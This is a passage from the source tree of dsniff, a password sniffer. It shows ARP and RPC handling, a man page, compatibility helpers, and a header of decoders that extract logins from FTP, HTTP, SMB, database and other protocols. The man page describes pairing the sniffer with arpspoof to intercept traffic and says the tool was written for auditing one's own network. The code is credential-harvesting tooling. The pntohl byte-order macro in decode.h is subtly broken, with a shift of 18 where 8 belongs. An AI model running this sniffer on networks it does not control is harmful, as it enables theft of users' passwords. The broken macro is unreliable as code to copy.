-= dlen; 59 | 60 | if (n == 0) 61 | return(dlen + strlen(s)); 62 | while (*s != '\0') { 63 | if (n != 1) { 64 | *d++ = *s; 65 | n--; 66 | } 67 | s++; 68 | } 69 | *d = '\0'; 70 | 71 | return(dlen + (s - src)); /* count does not include NUL */ 72 | } 73 | -------------------------------------------------------------------------------- /arp.c: -------------------------------------------------------------------------------- 1 | /* 2 | * arp.c 3 | * 4 | * ARP cache routines. 5 | * 6 | * Copyright (c) 1999 Dug Song 7 | * 8 | * $Id: arp.c,v 1.8 2001/03/15 08:32:58 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | #include 15 | #include 16 | #ifdef BSD 17 | #include 18 | #include 19 | #include 20 | #ifdef __FreeBSD__ /* XXX */ 21 | #define ether_addr_octet octet 22 | #endif 23 | #else /* !BSD */ 24 | #include 25 | #ifndef __linux__ 26 | #include 27 | #endif 28 | #endif /* !BSD */ 29 | #include 30 | #include 31 | #include 32 | #include 33 | 34 | #include 35 | #include 36 | #include 37 | 38 | #include "arp.h" 39 | 40 | #ifdef BSD 41 | int 42 | arp_cache_lookup(in_addr_t ip, struct ether_addr *ether, const char* linf) 43 | { 44 | int mib[6]; 45 | size_t len; 46 | char *buf, *next, *end; 47 | struct rt_msghdr *rtm; 48 | struct sockaddr_inarp *sin; 49 | struct sockaddr_dl *sdl; 50 | 51 | mib[0] = CTL_NET; 52 | mib[1] = AF_ROUTE; 53 | mib[2] = 0; 54 | mib[3] = AF_INET; 55 | mib[4] = NET_RT_FLAGS; 56 | mib[5] = RTF_LLINFO; 57 | 58 | if (sysctl(mib, 6, NULL, &len, NULL, 0) < 0) 59 | return (-1); 60 | 61 | if ((buf = (char *)malloc(len)) == NULL) 62 | return (-1); 63 | 64 | if (sysctl(mib, 6, buf, &len, NULL, 0) < 0) { 65 | free(buf); 66 | return (-1); 67 | } 68 | end = buf + len; 69 | 70 | for (next = buf ; next < end ; next += rtm->rtm_msglen) { 71 | rtm = (struct rt_msghdr *)next; 72 | sin = (struct sockaddr_inarp *)(rtm + 1); 73 | sdl = (struct sockaddr_dl *)(sin + 1); 74 | 75 | if (sin->sin_addr.s_addr == ip && sdl->sdl_alen) { 76 | memcpy(ether->ether_addr_octet, LLADDR(sdl), 77 | ETHER_ADDR_LEN); 78 | free(buf); 79 | return (0); 80 | } 81 | } 82 | free(buf); 83 | 84 | return (-1); 85 | } 86 | 87 | #else /* !BSD */ 88 | 89 | #ifndef ETHER_ADDR_LEN /* XXX - Solaris */ 90 | #define ETHER_ADDR_LEN 6 91 | #endif 92 | 93 | int 94 | arp_cache_lookup(in_addr_t ip, struct ether_addr *ether, const char* lif) 95 | { 96 | int sock; 97 | struct arpreq ar; 98 | struct sockaddr_in *sin; 99 | 100 | memset((char *)&ar, 0, sizeof(ar)); 101 | #ifdef __linux__ 102 | strncpy(ar.arp_dev, lif, strlen(lif)); 103 | #endif 104 | sin = (struct sockaddr_in *)&ar.arp_pa; 105 | sin->sin_family = AF_INET; 106 | sin->sin_addr.s_addr = ip; 107 | 108 | if ((sock = socket(AF_INET, SOCK_DGRAM, 0)) == -1) { 109 | return (-1); 110 | } 111 | if (ioctl(sock, SIOCGARP, (caddr_t)&ar) == -1) { 112 | close(sock); 113 | return (-1); 114 | } 115 | close(sock); 116 | memcpy(ether->ether_addr_octet, ar.arp_ha.sa_data, ETHER_ADDR_LEN); 117 | 118 | return (0); 119 | } 120 | 121 | #endif /* !BSD */ 122 | -------------------------------------------------------------------------------- /rpc.c: -------------------------------------------------------------------------------- 1 | /* 2 | * rpc.c 3 | * 4 | * Copyright (c) 2000 Dug Song 5 | * 6 | * $Id: rpc.c,v 1.8 2001/03/15 08:33:04 dugsong Exp $ 7 | */ 8 | 9 | #include "config.h" 10 | 11 | #include 12 | #include 13 | 14 | #include 15 | #include 16 | 17 | #include "decode.h" 18 | #include "rpc.h" 19 | 20 | #define XIDMAPSIZE 64 21 | 22 | static struct xid_map xid_maps[XIDMAPSIZE]; 23 | 24 | static int xid_map_next = 0; 25 | static int xid_map_hint = 0; 26 | 27 | /* xid_map adapted from tcpdump's print-nfs.c */ 28 | 29 | void 30 | xid_map_enter(u_int32_t xid, u_int32_t prog, u_int32_t vers, 31 | u_int32_t proc, void *data) 32 | { 33 | struct xid_map *mp; 34 | 35 | mp = &xid_maps[xid_map_next]; 36 | 37 | if (++xid_map_next >= XIDMAPSIZE) 38 | xid_map_next = 0; 39 | 40 | mp->xid = xid; 41 | mp->prog = prog; 42 | mp->vers = vers; 43 | mp->proc = proc; 44 | mp->data = data; 45 | } 46 | 47 | struct xid_map * 48 | xid_map_find(int xid) 49 | { 50 | struct xid_map *mp; 51 | int i; 52 | 53 | /* Start searching from where we last left off. */ 54 | i = xid_map_hint; 55 | do { 56 | mp = &xid_maps[i]; 57 | if (mp->xid == xid) { 58 | /* match */ 59 | xid_map_hint = i; 60 | return (mp); 61 | } 62 | if (++i >= XIDMAPSIZE) 63 | i = 0; 64 | } while (i != xid_map_hint); 65 | 66 | return (NULL); 67 | } 68 | 69 | int 70 | rpc_decode(u_char *buf, int len, struct rpc_msg *msg) 71 | { 72 | XDR xdrs; 73 | u_int32_t fraghdr; 74 | u_char *p, *tmp; 75 | int stat, tmplen; 76 | 77 | if (len < 20) 78 | return (0); 79 | 80 | p = buf + 4; 81 | 82 | /* If not recognizably RPC, try TCP record defragmentation */ 83 | if (pntohl(p) != CALL && pntohl(p) != REPLY) { 84 | tmp = buf; 85 | tmplen = 0; 86 | 87 | for (;;) { 88 | fraghdr = pntohl(tmp); 89 | 90 | if (FRAGLEN(fraghdr) + 4 > len) 91 | return (0); 92 | 93 | len -= 4; 94 | memmove(tmp, tmp + 4, len); 95 | tmplen += FRAGLEN(fraghdr); 96 | 97 | if (LASTFRAG(fraghdr)) 98 | break; 99 | 100 | tmp += FRAGLEN(fraghdr); 101 | len -= FRAGLEN(fraghdr); 102 | 103 | if (len < 4) 104 | return (0); 105 | } 106 | len = tmplen; 107 | } 108 | /* Decode RPC message. */ 109 | memset(msg, 0, sizeof(*msg)); 110 | 111 | if (ntohl(((struct rpc_msg *)buf)->rm_direction) == CALL) { 112 | xdrmem_create(&xdrs, buf, len, XDR_DECODE); 113 | 114 | if (!xdr_callmsg(&xdrs, msg)) { 115 | xdr_destroy(&xdrs); 116 | return (0); 117 | } 118 | } 119 | else if (ntohl(((struct rpc_msg *)buf)->rm_direction) == REPLY) { 120 | msg->acpted_rply.ar_results.proc = (xdrproc_t) xdr_void; 121 | xdrmem_create(&xdrs, buf, len, XDR_DECODE); 122 | 123 | if (!xdr_replymsg(&xdrs, msg)) { 124 | xdr_destroy(&xdrs); 125 | return (0); 126 | } 127 | } 128 | stat = xdr_getpos(&xdrs); 129 | xdr_destroy(&xdrs); 130 | 131 | return (stat); 132 | } 133 | 134 | -------------------------------------------------------------------------------- /dsniff.8: -------------------------------------------------------------------------------- 1 | .TH DSNIFF 8 2 | .ad 3 | .fi 4 | .SH NAME 5 | dsniff 6 | \- 7 | password sniffer 8 | .SH SYNOPSIS 9 | .na 10 | .nf 11 | .fi 12 | \fBdsniff\fR [\fB-c\fR] [\fB-d\fR] [\fB-m\fR] [\fB-n\fR] [\fB-i 13 | \fIinterface\fR | \fB-p \fIpcapfile\fR] [\fB-s \fIsnaplen\fR] [\fB-f \fIservices\fR] 14 | [\fB-t \fItrigger[,...]\fR]] 15 | [\fB-r\fR|\fB-w\fR \fIsavefile\fR] [\fIexpression\fR] 16 | .SH DESCRIPTION 17 | .ad 18 | .fi 19 | \fBdsniff\fR is a password sniffer which handles FTP, Telnet, SMTP, 20 | HTTP, POP, poppass, NNTP, IMAP, SNMP, LDAP, Rlogin, RIP, OSPF, PPTP 21 | MS-CHAP, NFS, VRRP, YP/NIS, SOCKS, X11, CVS, IRC, AIM, ICQ, Napster, 22 | PostgreSQL, Meeting Maker, Citrix ICA, Symantec pcAnywhere, NAI 23 | Sniffer, Microsoft SMB, Oracle SQL*Net, Sybase and Microsoft SQL 24 | protocols. 25 | .LP 26 | \fBdsniff\fR automatically detects and minimally parses each 27 | application protocol, only saving the interesting bits, and uses 28 | Berkeley DB as its output file format, only logging unique 29 | authentication attempts. Full TCP/IP reassembly is provided by 30 | libnids(3). 31 | .LP 32 | I wrote \fBdsniff\fR with honest intentions - to audit my own network, 33 | and to demonstrate the insecurity of cleartext network protocols. 34 | Please do not abuse this software. 35 | .SH OPTIONS 36 | .IP \fB-c\fR 37 | Perform half-duplex TCP stream reassembly, to handle asymmetrically 38 | routed traffic (such as when using arpspoof(8) to intercept client 39 | traffic bound for the local gateway). 40 | .IP \fB-d\fR 41 | Enable debugging mode. 42 | .IP \fB-m\fR 43 | Enable automatic protocol detection. 44 | .IP \fB-n\fR 45 | Do not resolve IP addresses to hostnames. 46 | .IP "\fB-i \fIinterface\fR" 47 | Specify the interface to listen on. 48 | .IP "\fB-p \fIpcapfile\fR" 49 | Rather than processing the contents of packets observed upon the network 50 | process the given PCAP capture file. 51 | .IP "\fB-s \fIsnaplen\fR" 52 | Analyze at most the first \fIsnaplen\fR bytes of each TCP connection, 53 | rather than the default of 1024. 54 | .IP "\fB-f \fIservices\fR" 55 | Load triggers from a \fIservices\fR file. 56 | .IP "\fB -t \fItrigger\fR[,...]" 57 | Load triggers from a comma-separated list, specified as 58 | \fIport\fR/\fIproto\fR=\fIservice\fR (e.g. 80/tcp=http). 59 | .IP "\fB-r \fIsavefile\fR" 60 | Read sniffed sessions from a \fIsavefile\fR created with the \fB-w\fR 61 | option. 62 | .IP "\fB-w \fIfile\fR" 63 | Write sniffed sessions to \fIsavefile\fR rather than parsing and 64 | printing them out. 65 | .IP "\fIexpression\fR" 66 | Specify a tcpdump(8) filter expression to select traffic to sniff. 67 | .LP 68 | On a hangup signal \fBdsniff\fR will dump its current trigger table to 69 | \fIdsniff.services\fR. 70 | .SH FILES 71 | .IP \fI/usr/local/lib/dsniff.services\fR 72 | Default trigger table 73 | .IP \fI/usr/local/lib/dsniff.magic\fR 74 | Network protocol magic 75 | .SH "SEE ALSO" 76 | arpspoof(8), libnids(3), services(5), magic(5) 77 | .SH AUTHOR 78 | .na 79 | .nf 80 | Dug Song 81 | .SH BUGS 82 | \fBdsniff\fR's automatic protocol detection feature is based on the 83 | classic file(1) command by Ian Darwin, and shares its historical 84 | limitations and bugs. 85 | -------------------------------------------------------------------------------- /missing/strsep.c: -------------------------------------------------------------------------------- 1 | /* $Id: strsep.c,v 1.1 2000/11/28 18:26:52 dugsong Exp $ */ 2 | /* $OpenBSD: strsep.c,v 1.3 1997/08/20 04:28:14 millert Exp $ */ 3 | 4 | /*- 5 | * Copyright (c) 1990, 1993 6 | * The Regents of the University of California. All rights reserved. 7 | * 8 | * Redistribution and use in source and binary forms, with or without 9 | * modification, are permitted provided that the following conditions 10 | * are met: 11 | * 1. Redistributions of source code must retain the above copyright 12 | * notice, this list of conditions and the following disclaimer. 13 | * 2. Redistributions in binary form must reproduce the above copyright 14 | * notice, this list of conditions and the following disclaimer in the 15 | * documentation and/or other materials provided with the distribution. 16 | * 3. All advertising materials mentioning features or use of this software 17 | * must display the following acknowledgement: 18 | * This product includes software developed by the University of 19 | * California, Berkeley and its contributors. 20 | * 4. Neither the name of the University nor the names of its contributors 21 | * may be used to endorse or promote products derived from this software 22 | * without specific prior written permission. 23 | * 24 | * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND 25 | * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 26 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 27 | * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE 28 | * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 29 | * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 30 | * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 31 | * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT 32 | * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 33 | * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 34 | * SUCH DAMAGE. 35 | */ 36 | 37 | #include 38 | #include 39 | 40 | /* 41 | * Get next token from string *stringp, where tokens are possibly-empty 42 | * strings separated by characters from delim. 43 | * 44 | * Writes NULs into the string at *stringp to end tokens. 45 | * delim need not remain constant from call to call. 46 | * On return, *stringp points past the last NUL written (if there might 47 | * be further tokens), or is NULL (if there are definitely no more tokens). 48 | * 49 | * If *stringp is NULL, strsep returns NULL. 50 | */ 51 | char * 52 | strsep(stringp, delim) 53 | register char **stringp; 54 | register const char *delim; 55 | { 56 | register char *s; 57 | register const char *spanp; 58 | register int c, sc; 59 | char *tok; 60 | 61 | if ((s = *stringp) == NULL) 62 | return (NULL); 63 | for (tok = s;;) { 64 | c = *s++; 65 | spanp = delim; 66 | do { 67 | if ((sc = *spanp++) == c) { 68 | if (c == 0) 69 | s = NULL; 70 | else 71 | s[-1] = 0; 72 | *stringp = s; 73 | return (tok); 74 | } 75 | } while (sc != 0); 76 | } 77 | /* NOTREACHED */ 78 | } 79 | -------------------------------------------------------------------------------- /config.h.in: -------------------------------------------------------------------------------- 1 | /* config.h.in. Generated automatically from configure.in by autoheader. */ 2 | 3 | /* Define to empty if the keyword does not work. */ 4 | #undef const 5 | 6 | /* Define if you have the strftime function. */ 7 | #undef HAVE_STRFTIME 8 | 9 | /* Define as the return type of signal handlers (int or void). */ 10 | #undef RETSIGTYPE 11 | 12 | /* Define to `unsigned' if doesn't define. */ 13 | #undef size_t 14 | 15 | /* Define if you have the ANSI C header files. */ 16 | #undef STDC_HEADERS 17 | 18 | /* Define if your declares struct tm. */ 19 | #undef TM_IN_SYS_TIME 20 | 21 | /* Define if the X Window System is missing or not being used. */ 22 | #undef X_DISPLAY_MISSING 23 | 24 | /* Define to 'uint32_t' if doesn't define. */ 25 | #undef u_int32_t 26 | 27 | /* Define to 'uint64_t' if doesn't define. */ 28 | #undef u_int64_t 29 | 30 | /* Define to 'u_int32_t' if doesn't define. */ 31 | #undef in_addr_t 32 | 33 | /* Define if you have the header file. */ 34 | #undef HAVE_DB_H 35 | 36 | /* Define if you have the header file. */ 37 | #undef HAVE_DB_185_H 38 | 39 | /* Should be in , *sigh* */ 40 | #undef HAVE_MINMAX 41 | #ifndef HAVE_MINMAX 42 | #define MIN(a,b) (((a)<(b))?(a):(b)) 43 | #define MAX(a,b) (((a)>(b))?(a):(b)) 44 | #endif 45 | 46 | /* Define if you have the MD5Update function. */ 47 | #undef HAVE_MD5UPDATE 48 | 49 | /* Define if you have the dirname function. */ 50 | #undef HAVE_DIRNAME 51 | 52 | /* Define if you have the ether_ntoa function. */ 53 | #undef HAVE_ETHER_NTOA 54 | 55 | /* Define if you have the gethostname function. */ 56 | #undef HAVE_GETHOSTNAME 57 | 58 | /* Define if you have the socket function. */ 59 | #undef HAVE_SOCKET 60 | 61 | /* Define if you have the strdup function. */ 62 | #undef HAVE_STRDUP 63 | 64 | /* Define if you have the strlcat function. */ 65 | #undef HAVE_STRLCAT 66 | 67 | /* Define if you have the strlcpy function. */ 68 | #undef HAVE_STRLCPY 69 | 70 | /* Define if you have the strsep function. */ 71 | #undef HAVE_STRSEP 72 | 73 | /* Define if you have the strstr function. */ 74 | #undef HAVE_STRSTR 75 | 76 | /* Define if you have the warnx function. */ 77 | #undef HAVE_WARNX 78 | 79 | /* Define if you have the header file. */ 80 | #undef HAVE_ERR_H 81 | 82 | /* Define if you have the header file. */ 83 | #undef HAVE_FCNTL_H 84 | 85 | /* Define if you have the header file. */ 86 | #undef HAVE_LIBGEN_H 87 | 88 | /* Define if you have the header file. */ 89 | #undef HAVE_NET_IF_TUN_H 90 | 91 | /* Define if you have the header file. */ 92 | #undef HAVE_SYS_IOCTL_H 93 | 94 | /* Define if you have the header file. */ 95 | #undef HAVE_SYS_QUEUE_H 96 | 97 | /* Define if you have the header file. */ 98 | #undef HAVE_UNISTD_H 99 | 100 | /* Define if you have the nsl library (-lnsl). */ 101 | #undef HAVE_LIBNSL 102 | 103 | /* Define if you have the resolv library (-lresolv). */ 104 | #undef HAVE_LIBRESOLV 105 | 106 | /* Define if you have the rpcsvc library (-lrpcsvc). */ 107 | #undef HAVE_LIBRPCSVC 108 | 109 | /* Define if you have the socket library (-lsocket). */ 110 | #undef HAVE_LIBSOCKET 111 | -------------------------------------------------------------------------------- /missing/err.c: -------------------------------------------------------------------------------- 1 | /* 2 | * err.c 3 | * 4 | * Adapted from OpenBSD libc *err* *warn* code. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * Copyright (c) 1993 9 | * The Regents of the University of California. All rights reserved. 10 | * 11 | * Redistribution and use in source and binary forms, with or without 12 | * modification, are permitted provided that the following conditions 13 | * are met: 14 | * 1. Redistributions of source code must retain the above copyright 15 | * notice, this list of conditions and the following disclaimer. 16 | * 2. Redistributions in binary form must reproduce the above copyright 17 | * notice, this list of conditions and the following disclaimer in the 18 | * documentation and/or other materials provided with the distribution. 19 | * 3. All advertising materials mentioning features or use of this software 20 | * must display the following acknowledgement: 21 | * This product includes software developed by the University of 22 | * California, Berkeley and its contributors. 23 | * 4. Neither the name of the University nor the names of its contributors 24 | * may be used to endorse or promote products derived from this software 25 | * without specific prior written permission. 26 | * 27 | * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND 28 | * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 29 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 30 | * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE 31 | * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 32 | * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 33 | * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 34 | * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT 35 | * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 36 | * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 37 | * SUCH DAMAGE. 38 | */ 39 | 40 | #include 41 | #include 42 | #include 43 | #include 44 | #include 45 | 46 | void 47 | err(int eval, const char *fmt, ...) 48 | { 49 | va_list ap; 50 | 51 | va_start(ap, fmt); 52 | if (fmt != NULL) { 53 | (void)vfprintf(stderr, fmt, ap); 54 | (void)fprintf(stderr, ": "); 55 | } 56 | va_end(ap); 57 | (void)fprintf(stderr, "%s\n", strerror(errno)); 58 | exit(eval); 59 | } 60 | 61 | void 62 | warn(const char *fmt, ...) 63 | { 64 | va_list ap; 65 | 66 | va_start(ap, fmt); 67 | if (fmt != NULL) { 68 | (void)vfprintf(stderr, fmt, ap); 69 | (void)fprintf(stderr, ": "); 70 | } 71 | va_end(ap); 72 | (void)fprintf(stderr, "%s\n", strerror(errno)); 73 | } 74 | 75 | void 76 | errx(int eval, const char *fmt, ...) 77 | { 78 | va_list ap; 79 | 80 | va_start(ap, fmt); 81 | if (fmt != NULL) 82 | (void)vfprintf(stderr, fmt, ap); 83 | (void)fprintf(stderr, "\n"); 84 | va_end(ap); 85 | exit(eval); 86 | } 87 | 88 | void 89 | warnx(const char *fmt, ...) 90 | { 91 | va_list ap; 92 | 93 | va_start(ap, fmt); 94 | if (fmt != NULL) 95 | (void)vfprintf(stderr, fmt, ap); 96 | (void)fprintf(stderr, "\n"); 97 | va_end(ap); 98 | } 99 | 100 | -------------------------------------------------------------------------------- /missing/ethers.c: -------------------------------------------------------------------------------- 1 | /* $Id: ethers.c,v 1.1 2000/04/08 20:50:28 dugsong Exp $ */ 2 | /* $OpenBSD: ethers.c,v 1.10 1998/11/18 23:28:54 deraadt Exp $ */ 3 | 4 | /* 5 | * Copyright (c) 1998 Todd C. Miller 6 | * All rights reserved. 7 | * 8 | * Redistribution and use in source and binary forms, with or without 9 | * modification, are permitted provided that the following conditions 10 | * are met: 11 | * 1. Redistributions of source code must retain the above copyright 12 | * notice, this list of conditions and the following disclaimer. 13 | * 2. Redistributions in binary form must reproduce the above copyright 14 | * notice, this list of conditions and the following disclaimer in the 15 | * documentation and/or other materials provided with the distribution. 16 | * 3. The name of the author may not be used to endorse or promote products 17 | * derived from this software without specific prior written permission. 18 | * 19 | * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, 20 | * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY 21 | * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL 22 | * THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 23 | * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 24 | * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; 25 | * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, 26 | * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 27 | * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF 28 | * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 29 | */ 30 | 31 | /* 32 | * ethers(3) a la Sun. 33 | * Originally Written by Roland McGrath 10/14/93. 34 | * Substantially modified by Todd C. Miller 35 | */ 36 | 37 | #include 38 | #include 39 | #include 40 | #include 41 | #include 42 | #include 43 | #include 44 | #include 45 | #include 46 | #include 47 | 48 | char * 49 | ether_ntoa(e) 50 | struct ether_addr *e; 51 | { 52 | static char a[] = "xx:xx:xx:xx:xx:xx"; 53 | 54 | if (e->ether_addr_octet[0] > 0xFF || e->ether_addr_octet[1] > 0xFF || 55 | e->ether_addr_octet[2] > 0xFF || e->ether_addr_octet[3] > 0xFF || 56 | e->ether_addr_octet[4] > 0xFF || e->ether_addr_octet[5] > 0xFF) { 57 | errno = EINVAL; 58 | return (NULL); 59 | } 60 | 61 | (void)sprintf(a, "%02x:%02x:%02x:%02x:%02x:%02x", 62 | e->ether_addr_octet[0], e->ether_addr_octet[1], 63 | e->ether_addr_octet[2], e->ether_addr_octet[3], 64 | e->ether_addr_octet[4], e->ether_addr_octet[5]); 65 | 66 | return (a); 67 | } 68 | 69 | static char * 70 | _ether_aton(s, e) 71 | char *s; 72 | struct ether_addr *e; 73 | { 74 | int i; 75 | long l; 76 | char *pp; 77 | 78 | while (isspace(*s)) 79 | s++; 80 | 81 | /* expect 6 hex octets separated by ':' or space/NUL if last octet */ 82 | for (i = 0; i < 6; i++) { 83 | l = strtol(s, &pp, 16); 84 | if (pp == s || l > 0xFF || l < 0) 85 | return (NULL); 86 | if (!(*pp == ':' || (i == 5 && (isspace(*pp) || *pp == '\0')))) 87 | return (NULL); 88 | e->ether_addr_octet[i] = (u_char)l; 89 | s = pp + 1; 90 | } 91 | 92 | /* return character after the octets ala strtol(3) */ 93 | return (pp); 94 | } 95 | 96 | struct ether_addr * 97 | ether_aton(s) 98 | char *s; 99 | { 100 | static struct ether_addr n; 101 | 102 | return (_ether_aton(s, &n) ? &n : NULL); 103 | } 104 | 105 | -------------------------------------------------------------------------------- /decode.h: -------------------------------------------------------------------------------- 1 | /* 2 | * decode.h 3 | * 4 | * Protocol decoding routines. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode.h,v 1.5 2001/03/15 08:33:06 dugsong Exp $ 9 | */ 10 | 11 | #ifndef DECODE_H 12 | #define DECODE_H 13 | 14 | typedef int (*decode_func)(u_char *, int, u_char *, int); 15 | 16 | struct decode { 17 | char *dc_name; 18 | decode_func dc_func; 19 | }; 20 | 21 | struct decode *getdecodebyname(const char *name); 22 | 23 | 24 | #define pletohs(p) ((u_short) \ 25 | ((u_short)*((u_char *)p+1)<<8| \ 26 | (u_short)*((u_char *)p+0)<<0)) 27 | 28 | #define pletohl(p) ((u_int32_t)*((u_char *)p+3)<<24| \ 29 | (u_int32_t)*((u_char *)p+2)<<16| \ 30 | (u_int32_t)*((u_char *)p+1)<<8| \ 31 | (u_int32_t)*((u_char *)p+0)<<0) 32 | 33 | #define pntohs(p) ((u_short) \ 34 | ((u_short)*((u_char *)p+1)<<0| \ 35 | (u_short)*((u_char *)p+0)<<8)) 36 | 37 | #define pntohl(p) ((u_int32_t)*((u_char *)p+3)<<0| \ 38 | (u_int32_t)*((u_char *)p+2)<<18| \ 39 | (u_int32_t)*((u_char *)p+1)<<16| \ 40 | (u_int32_t)*((u_char *)p+0)<<24) 41 | 42 | int strip_telopts(u_char *buf, int len); 43 | 44 | int strip_lines(char *buf, int max_lines); 45 | 46 | int is_ascii_string(char *buf, int len); 47 | 48 | u_char *bufbuf(u_char *big, int blen, u_char *little, int llen); 49 | 50 | int decode_aim(u_char *buf, int len, u_char *obuf, int olen); 51 | int decode_citrix(u_char *buf, int len, u_char *obuf, int olen); 52 | int decode_cvs(u_char *buf, int len, u_char *obuf, int olen); 53 | int decode_ftp(u_char *buf, int len, u_char *obuf, int olen); 54 | int decode_hex(u_char *buf, int len, u_char *obuf, int olen); 55 | int decode_http(u_char *buf, int len, u_char *obuf, int olen); 56 | int decode_icq(u_char *buf, int len, u_char *obuf, int olen); 57 | int decode_imap(u_char *buf, int len, u_char *obuf, int olen); 58 | int decode_irc(u_char *buf, int len, u_char *obuf, int olen); 59 | int decode_ldap(u_char *buf, int len, u_char *obuf, int olen); 60 | int decode_mmxp(u_char *buf, int len, u_char *obuf, int olen); 61 | int decode_mountd(u_char *buf, int len, u_char *obuf, int olen); 62 | int decode_napster(u_char *buf, int len, u_char *obuf, int olen); 63 | int decode_nntp(u_char *buf, int len, u_char *obuf, int olen); 64 | int decode_oracle(u_char *buf, int len, u_char *obuf, int olen); 65 | int decode_ospf(u_char *buf, int len, u_char *obuf, int olen); 66 | int decode_pcanywhere(u_char *buf, int len, u_char *obuf, int olen); 67 | int decode_pop(u_char *buf, int len, u_char *obuf, int olen); 68 | int decode_poppass(u_char *buf, int len, u_char *obuf, int olen); 69 | int decode_portmap(u_char *buf, int len, u_char *obuf, int olen); 70 | int decode_postgresql(u_char *buf, int len, u_char *obuf, int olen); 71 | int decode_pptp(u_char *buf, int len, u_char *obuf, int olen); 72 | int decode_rip(u_char *buf, int len, u_char *obuf, int olen); 73 | int decode_rlogin(u_char *buf, int len, u_char *obuf, int olen); 74 | int decode_smb(u_char *buf, int len, u_char *obuf, int olen); 75 | int decode_smtp(u_char *buf, int len, u_char *obuf, int olen); 76 | int decode_sniffer(u_char *buf, int len, u_char *obuf, int olen); 77 | int decode_snmp(u_char *buf, int len, u_char *obuf, int olen); 78 | int decode_socks(u_char *buf, int len, u_char *obuf, int olen); 79 | int decode_tds(u_char *buf, int len, u_char *obuf, int olen); 80 | int decode_telnet(u_char *buf, int len, u_char *obuf, int olen); 81 | int decode_vrrp(u_char *buf, int len, u_char *obuf, int olen); 82 | int decode_x11(u_char *buf, int len, u_char *obuf, int olen); 83 | int decode_yppasswd(u_char *buf, int len, u_char *obuf, int olen); 84 | int decode_ypserv(u_char *buf, int len, u_char *obuf, int olen); 85 | 86 | #endif /* DECODE_H */ 87 | -------------------------------------------------------------------------------- /decode_yp.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_yp.c 3 | * 4 | * RPC "Yellow Pee". 5 | * 6 | * Totally untested, i don't run YP. Let me know if this works. :-) 7 | * 8 | * Copyright (c) 2000 Dug Song 9 | * 10 | * $Id: decode_yp.c,v 1.6 2001/03/15 08:33:03 dugsong Exp $ 11 | */ 12 | 13 | #include "config.h" 14 | 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | 21 | #include 22 | #include 23 | #include 24 | 25 | #include "rpc.h" 26 | #include "decode.h" 27 | 28 | /* XXX - varies on different systems :-( */ 29 | 30 | struct my_passwd { 31 | char *pw_name; 32 | char *pw_passwd; 33 | int pw_uid; 34 | int pw_gid; 35 | char *pw_gecos; 36 | char *pw_dir; 37 | char *pw_shell; 38 | }; 39 | 40 | struct my_yppasswd { 41 | char *oldpass; 42 | struct my_passwd newpw; 43 | }; 44 | 45 | static bool_t 46 | xdr_my_passwd(XDR *xdrs, struct my_passwd *objp) 47 | { 48 | if (xdr_string(xdrs, &objp->pw_name, ~0) && 49 | xdr_string(xdrs, &objp->pw_passwd, ~0) && 50 | xdr_int(xdrs, &objp->pw_uid) && 51 | xdr_int(xdrs, &objp->pw_gid) && 52 | xdr_string(xdrs, &objp->pw_gecos, ~0) && 53 | xdr_string(xdrs, &objp->pw_dir, ~0) && 54 | xdr_string(xdrs, &objp->pw_shell, ~0)) 55 | return (TRUE); 56 | 57 | return (FALSE); 58 | } 59 | 60 | static bool_t 61 | xdr_my_yppasswd(XDR *xdrs, struct my_yppasswd *objp) 62 | { 63 | if (xdr_string(xdrs, &objp->oldpass, ~0) && 64 | xdr_my_passwd(xdrs, &objp->newpw)) 65 | return (TRUE); 